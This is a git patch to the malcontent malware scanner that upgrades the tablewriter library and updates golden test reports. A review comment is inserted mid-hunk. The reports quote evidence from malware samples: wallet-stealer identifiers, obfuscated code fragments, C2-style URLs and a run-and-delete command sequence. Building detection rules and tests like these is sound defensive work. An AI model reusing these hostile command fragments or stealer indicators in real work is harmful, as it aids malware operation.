From d9bc5bd7b46d395c62e6ba4d09c6e9fe1d2f0973 Mon Sep 17 00:00:00 2001
From: egibs <20933572+egibs@users.noreply.github.com>
Date: Thu, 29 May 2025 08:04:54 -0500
Subject: [PATCH 1/4] Migrate tablewriter from 0.0.5 to 1.0.7

Signed-off-by: egibs <20933572+egibs@users.noreply.github.com>
---
go.mod | 4 +++-
go.sum | 9 ++++++---
pkg/render/markdown.go | 15 +++++++++------
.../2024.lottie-player/lottie-player.min.js.mdiff | 4 ++--
tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md | 2 +-
tests/linux/2023.ConnectBack/tiny.md | 2 +-
tests/linux/2024.Darkcracks/darkcracks.sh.md | 2 +-
tests/linux/UPX/06ed158.md | 2 +-
tests/linux/clean/code-oss.md | 2 +-
tests/linux/clean/cpack.md | 2 +-
tests/linux/clean/ls.x86_64.md | 2 +-
tests/linux/clean/lslogins.md | 2 +-
tests/linux/clean/pandoc.md | 2 +-
tests/linux/clean/ping.x86_64.md | 2 +-
tests/linux/clean/qemu-system-xtensa.md | 2 +-
tests/linux/clean/redis-server.aarch64.md | 2 +-
tests/linux/clean/slack.md | 2 +-
tests/linux/clean/tree-sitter.md | 2 +-
tests/linux/clean/trufflehog.md | 2 +-
tests/linux/clean/viewgam.md | 2 +-
tests/linux/clean/zipdetails.md | 2 +-
.../2023.3CX/libffmpeg.change_decrease.mdiff | 2 +-
.../2023.3CX/libffmpeg.change_increase.mdiff | 2 +-
.../2023.3CX/libffmpeg.change_unrelated.mdiff | 4 ++--
tests/macOS/2023.3CX/libffmpeg.dirty.mdiff | 2 +-
tests/macOS/2023.3CX/libffmpeg.increase.mdiff | 2 +-
.../2023.3CX/libffmpeg.increase_unrelated.mdiff | 4 ++--
.../SpectralBlur-macshare.md | 2 +-
tests/macOS/clean/ls.mdiff | 4 ++--
tests/windows/2024.Sharp/sharpil_RAT.exe.md | 2 +-
tests/windows/2024.aspdasdksa2/Nil.exe.md | 2 +-
31 files changed, 50 insertions(+), 42 deletions(-)

diff --git a/go.mod b/go.mod
index e84d6cf6c..3f4d4f466 100644
--- a/go.mod
+++ b/go.mod
@@ -21,7 +21,7 @@ require (
 github.com/google/go-containerregistry v0.20.5
 github.com/klauspost/compress v1.18.0
 github.com/klauspost/pgzip v1.2.6
- github.com/olekukonko/tablewriter v0.0.5
+ github.com/olekukonko/tablewriter v1.0.7
 github.com/shirou/gopsutil/v4 v4.25.4
 github.com/ulikunitz/xz v0.5.12
 github.com/urfave/cli/v2 v2.27.6
@@ -59,6 +59,8 @@ require (
 github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 // indirect
 github.com/muesli/cancelreader v0.2.2 // indirect
 github.com/muesli/termenv v0.16.0 // indirect
+ github.com/olekukonko/errors v0.0.0-20250405072817-4e6d85265da6 // indirect
+ github.com/olekukonko/ll v0.0.8 // indirect
 github.com/opencontainers/go-digest v1.0.0 // indirect
 github.com/opencontainers/image-spec v1.1.1 // indirect
 github.com/pkg/errors v0.9.1 // indirect
diff --git a/go.sum b/go.sum
index a681dcfc1..cd3ef7637 100644
--- a/go.sum
+++ b/go.sum
@@ -82,7 +82,6 @@ github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWE github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= github.com/mattn/go-localereader v0.0.1 h1:ygSAOl7ZXTx4RdPYinUpg6W99U8jWvWi9Ye2JC/oIi4= github.com/mattn/go-localereader v0.0.1/go.mod h1:8fBrzywKY7BI3czFoHkuzRoWE9C+EiG4R1k4Cjx5p88= -github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc= github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y=
@@ -93,8 +92,12 @@ github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELU github.com/muesli/cancelreader v0.2.2/go.mod h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo= github.com/muesli/termenv v0.16.0 h1:S5AlUN9dENB57rsbnkPyfdGuWIlkmzJjbFf0Tf5FWUc= github.com/muesli/termenv v0.16.0/go.mod h1:ZRfOIKPFDYQoDFF4Olj7/QJbW60Ol/kL1pU3VfY/Cnk= -github.com/olekukonko/tablewriter v0.0.5 h1:P2Ga83D34wi1o9J6Wh1mRuqd4mF/x/lgBS7N7AbDhec= -github.com/olekukonko/tablewriter v0.0.5/go.mod h1:hPp6KlRPjbx+hW8ykQs1w3UBbZlj6HuIJcUGPhkA7kY= +github.com/olekukonko/errors v0.0.0-20250405072817-4e6d85265da6 h1:r3FaAI0NZK3hSmtTDrBVREhKULp8oUeqLT5Eyl2mSPo= +github.com/olekukonko/errors v0.0.0-20250405072817-4e6d85265da6/go.mod h1:ppzxA5jBKcO1vIpCXQ9ZqgDh8iwODz6OXIGKU8r5m4Y= +github.com/olekukonko/ll v0.0.8 h1:sbGZ1Fx4QxJXEqL/6IG8GEFnYojUSQ45dJVwN2FH2fc= +github.com/olekukonko/ll v0.0.8/go.mod h1:En+sEW0JNETl26+K8eZ6/W4UQ7CYSrrgg/EdIYT2H8g= +github.com/olekukonko/tablewriter v1.0.7 h1:HCC2e3MM+2g72M81ZcJU11uciw6z/p82aEnm4/ySDGw= +github.com/olekukonko/tablewriter v1.0.7/go.mod h1:H428M+HzoUXC6JU2Abj9IT9ooRmdq9CxuDmKMtrOCMs= github.com/opencontainers/go-digest v1.0.0 h1:apOUWs51W5PlhuyGyz9FCeeBIOUDA/6nW8Oi/yOhh5U= github.com/opencontainers/go-digest v1.0.0/go.mod h1:0JzlMkj0TRzQZfJkVvzbP0HBR3IKzErnv2BNG4W4MAM= github.com/opencontainers/image-spec v1.1.1 h1:y0fUlFfIZhPF1W537XOLg0/fcx6zcHCJwooC2xJA040=
diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go
index 671ccca31..d5ef5d94c 100644
--- a/pkg/render/markdown.go
+++ b/pkg/render/markdown.go
@@ -15,6 +15,8 @@ import (
 "github.com/chainguard-dev/malcontent/pkg/malcontent"
 "github.com/olekukonko/tablewriter"
+ "github.com/olekukonko/tablewriter/renderer"
+ "github.com/olekukonko/tablewriter/tw"
 )
 var (
@@ -252,12 +254,13 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 }
 buf := bytes.NewBuffer([]byte{})
- table := tablewriter.NewWriter(buf)
- table.SetAutoWrapText(false)
- table.SetHeader([]string{"Risk", "Key", "Description", "Evidence"})
- table.SetBorders(tablewriter.Border{Left: true, Top: false, Right: true, Bottom: false})
- table.SetCenterSeparator("|")
- table.AppendBulk(data) // Add Bulk Data
+ table := tablewriter.NewTable(buf,
+ tablewriter.WithRenderer(renderer.NewMarkdown()),
+ tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleDefault)}),
+ tablewriter.WithRowAutoWrap(0),
+ )
+ table.Header([]string{"Risk", "Key", "Description", "Evidence"})
+ table.Bulk(data) // Add Bulk Data
 table.Render()
 // remove excess whitespace
diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
index 1ecf42b8e..493e9d08d 100644
--- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
+++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff
@@ -3,7 +3,7 @@ ### 49 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)
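Review bot: The results of `table.Bulk(data)` and `table.Render()` are dropped on the new side of this hunk; as far as I recall of the v1 tablewriter API both return an error (unlike the v0.0.5 `AppendBulk`/`Render` calls they replace), so a row that fails to append or a failed render now produces a silently truncated or empty table. markdownTable's signature and its exit path lie outside the hunk, but if the function returns an error the fix is `if err := table.Bulk(data); err != nil { return err }` with the same guard on `table.Render()`; otherwise at least log them rather than discard them. `tablewriter.WithRowAutoWrap(0)` also replaces the self-describing `SetAutoWrapText(false)` with a bare literal: the `tw` package exports named wrap modes (`tw.WrapNone`), and whether `0` selects "no wrapping" or is the unset value that falls back to the renderer's default is not visible here, so the named constant would make the intent explicit. The golden-file hunks in this commit change only the alignment row (`|--|` to `|:--:|`), which is consistent with wrapping being off but does not by itself confirm the literal is the intended mode. Separately, the go.mod hunk pulls in two new indirect modules, `github.com/olekukonko/errors` and `github.com/olekukonko/ll`; worth confirming the go.sum entries came from `go mod tidy` and that `go mod verify` passes before merging.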
[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)
[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)
[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)
[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)
[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)
[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)
[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)
[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)
[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)
[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)
[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)
[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)
[BraveWallet](https://github.com/search?q=BraveWallet&type=code)
[Ronin](https://github.com/search?q=Ronin&type=code)
[http](https://github.com/search?q=http&type=code) | | +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function(](https://github.com/search?q=function%28&type=code)
[charAt(s](https://github.com/search?q=charAt%28s&type=code)
[charAt(a](https://github.com/search?q=charAt%28a&type=code)
[charAt(n](https://github.com/search?q=charAt%28n&type=code)
[charAt(c](https://github.com/search?q=charAt%28c&type=code)
[charAt(t](https://github.com/search?q=charAt%28t&type=code)
[charAt(u](https://github.com/search?q=charAt%28u&type=code)
[charAt(w](https://github.com/search?q=charAt%28w&type=code)
[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)
[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)
[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)
[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)
[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)
[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)
[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)
[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)
[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)
[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)
[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)
[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)
[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)
[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)
[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)
[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)
[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)
[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)
[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)
[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)
[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)
[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)
[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)
[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)
[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)
[p>>>18](https://github.com/search?q=p%3E%3E%3E18&type=code)
[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)
[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)
[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)
[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)
[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)
[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)
[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)
[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)
[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)
[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)
[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)
[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)
[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)
[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)
[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)
[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)
[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)
[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)
[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)
[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)
[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)
[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)
[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)
[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)
[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)
[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)
[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)
[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)
[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)
[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)
[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)
[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)
[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)
[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)
[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)
[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)
[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)
[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)
[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)
[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)
[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)
[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)
[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)
[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)
[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)
[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)
[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)
[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)
[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)
[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)
[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)
[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code)
[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)
[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)
[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)
[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)
[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)
[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)
[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)
[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)
[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)
[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)
[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)
[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)
[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)
[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)
[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)
[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)
[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)
[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)
[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)
[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)
[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)
[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)
[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)
[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)
[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)
[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)
[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)
[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)
[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)
[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)
[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)
[q>>>0](https://github.com/search?q=q%3E%3E%3E0&type=code)
[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)
[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)
[t>>>9](https://github.com/search?q=t%3E%3E%3E9&type=code)
[t>>>7](https://github.com/search?q=t%3E%3E%3E7&type=code)
[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)
[q>>>3](https://github.com/search?q=q%3E%3E%3E3&type=code)
[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)
[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)
[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)
[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)
[s>>>8](https://github.com/search?q=s%3E%3E%3E8&type=code)
[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)
[u>>>8](https://github.com/search?q=u%3E%3E%3E8&type=code)
[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)
[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)
[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)
[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)
[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)
[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)
[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)
[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)
[v>>>8](https://github.com/search?q=v%3E%3E%3E8&type=code)
[p>>>8](https://github.com/search?q=p%3E%3E%3E8&type=code)
[w>>>3](https://github.com/search?q=w%3E%3E%3E3&type=code)
[r>>>8](https://github.com/search?q=r%3E%3E%3E8&type=code)
[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)
[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)
[a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)
[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)
[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)
[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)
[t>>>0](https://github.com/search?q=t%3E%3E%3E0&type=code)
[r>>>0](https://github.com/search?q=r%3E%3E%3E0&type=code)
[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)
[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)
[s>>>0](https://github.com/search?q=s%3E%3E%3E0&type=code)
[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)
[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)
[z>>>0](https://github.com/search?q=z%3E%3E%3E0&type=code)
[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)
[v>>>0](https://github.com/search?q=v%3E%3E%3E0&type=code)
[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)
[p>>>0](https://github.com/search?q=p%3E%3E%3E0&type=code)
[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)
[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)
[p>>>7](https://github.com/search?q=p%3E%3E%3E7&type=code)
[s>>>6](https://github.com/search?q=s%3E%3E%3E6&type=code)
[x>>>9](https://github.com/search?q=x%3E%3E%3E9&type=code)
[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)
[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)
[w>>>7](https://github.com/search?q=w%3E%3E%3E7&type=code) | | +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https://api.mantlescan.xyz/)
[https://mantlescan.xyz/](https://mantlescan.xyz/)
[https://openchain.xyz/](https://openchain.xyz/) | @@ -57,7 +57,7 @@ ### 5 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | -MEDIUM | [anti-static/obfuscation/strtoi](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/strtoi.yara#sketchy_parseint_math) | complex math and string to integer conversion | [alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)
[56320+65536](https://github.com/search?q=56320%2B65536&type=code)
[969v6h-12](https://github.com/search?q=969v6h-12&type=code)
[100*this](https://github.com/search?q=100%2Athis&type=code)
[100*Math](https://github.com/search?q=100%2AMath&type=code)
[parseInt](https://github.com/search?q=parseInt&type=code)
[180*Math](https://github.com/search?q=180%2AMath&type=code)
[01*this](https://github.com/search?q=01%2Athis&type=code)
[i-56320](https://github.com/search?q=i-56320&type=code)
[r-55296](https://github.com/search?q=r-55296&type=code)
[01*Math](https://github.com/search?q=01%2AMath&type=code)
[255*G](https://github.com/search?q=255%2AG&type=code)
[255*e](https://github.com/search?q=255%2Ae&type=code)
[001*t](https://github.com/search?q=001%2At&type=code)
[255*t](https://github.com/search?q=255%2At&type=code)
[001*r](https://github.com/search?q=001%2Ar&type=code)
[255*j](https://github.com/search?q=255%2Aj&type=code)
[001-e](https://github.com/search?q=001-e&type=code)
[001+e](https://github.com/search?q=001%2Be&type=code)
[255*u](https://github.com/search?q=255%2Au&type=code)
[984-3](https://github.com/search?q=984-3&type=code)
[01*a](https://github.com/search?q=01%2Aa&type=code)
[01*n](https://github.com/search?q=01%2An&type=code)
[01+i](https://github.com/search?q=01%2Bi&type=code)
[10*h](https://github.com/search?q=10%2Ah&type=code)
[v-90](https://github.com/search?q=v-90&type=code)
[h+90](https://github.com/search?q=h%2B90&type=code)
[19*e](https://github.com/search?q=19%2Ae&type=code)
[12*e](https://github.com/search?q=12%2Ae&type=code) | | -MEDIUM | [anti-static/obfuscation/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/utf16.yara#sketchy_fromCharCode_math) | complex math and utf16 code unit conversion | [fromCharCode](https://github.com/search?q=fromCharCode&type=code)
[alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)
[56320+65536](https://github.com/search?q=56320%2B65536&type=code)
[969v6h-12](https://github.com/search?q=969v6h-12&type=code)
[100*this](https://github.com/search?q=100%2Athis&type=code)
[100*Math](https://github.com/search?q=100%2AMath&type=code)
[180*Math](https://github.com/search?q=180%2AMath&type=code)
[01*this](https://github.com/search?q=01%2Athis&type=code)
[r-55296](https://github.com/search?q=r-55296&type=code)
[i-56320](https://github.com/search?q=i-56320&type=code)
[01*Math](https://github.com/search?q=01%2AMath&type=code)
[984-3](https://github.com/search?q=984-3&type=code)
[255*e](https://github.com/search?q=255%2Ae&type=code)
[255*t](https://github.com/search?q=255%2At&type=code)
[255*j](https://github.com/search?q=255%2Aj&type=code)
[001*t](https://github.com/search?q=001%2At&type=code)
[001*r](https://github.com/search?q=001%2Ar&type=code)
[001-e](https://github.com/search?q=001-e&type=code)
[001+e](https://github.com/search?q=001%2Be&type=code)
[255*G](https://github.com/search?q=255%2AG&type=code)
[255*u](https://github.com/search?q=255%2Au&type=code)
[01*n](https://github.com/search?q=01%2An&type=code)
[01*a](https://github.com/search?q=01%2Aa&type=code)
[10*h](https://github.com/search?q=10%2Ah&type=code)
[19*e](https://github.com/search?q=19%2Ae&type=code)
[12*e](https://github.com/search?q=12%2Ae&type=code)
[v-90](https://github.com/search?q=v-90&type=code)
[h+90](https://github.com/search?q=h%2B90&type=code)
[01+i](https://github.com/search?q=01%2Bi&type=code) | | -MEDIUM | [data/encoding/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/url.yara#decode_uri_component) | decodes URL components | [decodeURIComponent](https://github.com/search?q=decodeURIComponent&type=code) | diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md index 19457ba35..e2288f43d 100644 --- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md +++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md @@ -1,7 +1,7 @@ ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md index 6a4a77fbf..8ea5e9d9b 100644 --- a/tests/linux/2023.ConnectBack/tiny.md +++ b/tests/linux/2023.ConnectBack/tiny.md @@ -1,7 +1,7 @@ ## linux/2023.ConnectBack/tiny [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index 4513a8a7a..21947b244 100644 
--- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -1,7 +1,7 @@ ## linux/2024.Darkcracks/darkcracks.sh [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /;](https://github.com/search?q=cd+%2F%3B&type=code) | | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
